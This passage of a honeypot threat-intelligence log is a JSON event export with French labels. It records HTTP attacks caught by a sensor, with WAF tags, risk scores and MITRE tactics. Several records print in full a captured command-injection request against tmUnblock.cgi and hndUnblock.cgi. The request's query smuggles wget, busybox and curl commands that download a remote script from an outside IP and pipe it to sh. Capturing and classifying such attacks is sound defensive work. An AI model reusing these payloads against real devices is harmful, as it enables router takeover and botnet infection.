62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":442},{"id":11809347,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55124,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022875060f63f6f9b01b3fa72fee9673a1d2beb64f6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 291, \u0022payload_entropy\u0022: 5.129742773452375, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a632a9bf1f4d8320042226cb00eebb392dcde5b1\u0022, \u0022event_fingerprint\u0022: \u00220e54ecff1803ce4225e3df7b16689155cd3d019e\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224beb4156032c0cba1982095a899fe13b\u0022, \u0022path_pattern_hash\u0022: \u00227e7da887259ec686429949e3a182bb9c\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228d9fa64899ab219c4c4a8e556a32961c590be295\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhab\u2026\u0022, \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhab\u2026\u0022, \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":291},{"id":11809348,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55138,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002264082a1af3fcfb231944e267d5493de0b8e0037c\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 287, \u0022payload_entropy\u0022: 5.113715740087432, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a632a9bf1f4d8320042226cb00eebb392dcde5b1\u0022, \u0022event_fingerprint\u0022: \u0022797c79f7e0b7f9c08548cab16656a405febc06e5\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022497f550dffb549cc468c7b52e196f3c6\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\\r\\nHost: 62.3.\u0022, \u0022payload_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: 